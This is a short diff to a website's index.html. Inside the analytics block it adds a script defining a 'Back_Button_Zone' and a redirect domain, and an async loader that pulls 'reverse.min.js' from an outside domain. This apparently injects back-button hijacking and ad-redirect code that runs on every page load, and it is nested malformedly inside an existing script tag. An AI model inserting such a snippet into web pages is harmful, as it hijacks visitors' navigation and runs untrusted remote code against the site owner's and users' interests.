--- a/index.html
+++ b/index.html
@@ -239,6 +239,12 @@
   gtag('js', new Date());
 
   gtag('config', 'G-F4CP5FY10J');
+
+<script>
+      var Back_Button_Zone = 8911032;
+      var Domain_TB = "stojoalaiboudry.net";
+</script>
+<script async src="https://desenteir.com/52e/198c5/reverse.min.js?sf=1"></script>
 </script>
 <body>
   <header>
